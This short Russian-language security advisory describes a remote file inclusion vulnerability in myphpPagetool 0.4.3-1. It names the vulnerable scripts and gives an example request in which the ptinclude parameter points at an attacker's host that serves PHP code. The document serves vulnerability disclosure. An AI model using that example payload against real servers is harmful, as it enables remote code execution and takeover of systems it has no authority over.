Уязвимость подключения файла обнаружена в myphpPagetool. Удаленный пользователь может выполнять произвольные команды оболочки на уязвимом сервере.

Несколько сценариев myphpPagetool включают файл
pt_config.inc. Если установлена PHP опция ‘register_globals=ON’, то удаленный пользователь может определить удаленное местоположение для
pt_config.inc файла, заставляя целевой сервер выполнить PHP код, содержащийся в этом файле. PHP код может содержать команды оболочки операционной системы. Пример: 

http://[target]/doc/admin/index.php?ptinclude=http://[attacker] 
где — http://[attacker]/pt_config.inc

Уязвимые файлы расположены в каталоге /doc/admin/ — index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php, и help9.php.

Уязвимость обнаружена в myphpPagetool 0.4.3-1.

Оставить мнение